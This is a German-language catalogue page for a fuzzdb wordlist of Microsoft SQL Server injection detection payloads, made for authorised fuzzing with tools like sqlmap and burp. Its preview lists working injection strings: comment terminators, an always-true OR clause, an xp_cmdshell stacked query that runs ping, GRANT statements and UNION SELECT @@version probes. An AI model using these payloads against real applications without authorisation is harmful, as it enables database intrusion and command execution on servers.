FuzzDB MSSQL SQL Injection Detection
Erkennungs-Payloads für Microsoft-SQL-Server-Injection, einschließlich Kommentar-Terminatoren, xp_cmdshell-Sonden und UNION-basierter @@version-Offenlegungstests.
- Größe
- 448 B
- Kategorie
- Fuzzing
- Quelle
- fuzzdb-project/fuzzdb
- Lizenz
- GPLv2
- Empfohlene Tools
- sqlmapffufburp
Vorschau
Die ersten 12 Einträge. Lade die vollständige Liste (448 B) herunter oder kopiere sie über die Schaltflächen oben.
; -- '; -- '); -- '; exec master..xp_cmdshell 'ping 10.10.1.2'-- ' grant connect to name; grant resource to name; -- ' or 1=1 -- ' union (select @@version) -- ' union (select NULL, (select @@version)) -- ' union (select NULL, NULL, (select @@version)) -- ' union (select NULL, NULL, NULL, (select @@version)) -- ' union (select NULL, NULL, NULL, NULL, (select @@version)) -- ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --
Erkennungs-Payloads für Microsoft-SQL-Server-Injection, einschließlich Kommentar-Terminatoren, xp_cmdshell-Sonden und UNION-basierter @@version-Offenlegungstests.
Diese Liste ist auf Input-Fuzzing und Schwachstellensuche ausgerichtet. Sie umfasst rund 448 B und harmoniert gut mit Tools wie sqlmap, ffuf, burp. Wählen Sie die kleinste Liste, die zu Ihrem Auftrag passt: Kürzere Listen sind schneller und unauffälliger bei Online- Angriffen, während größere Listen eine breitere Abdeckung für Offline-Arbeiten bieten, bei denen Geschwindigkeit weniger eine Einschränkung darstellt.
Sie können die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in
Ihre Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt
aus ihrer Upstream-Quelle auf GitHub ausgeliefert.
Bezogen von fuzzdb-project/fuzzdb und vertrieben unter GPLv2. Verwenden Sie Wortlisten nur gegen Systeme, für deren Test Sie ausdrücklich autorisiert sind.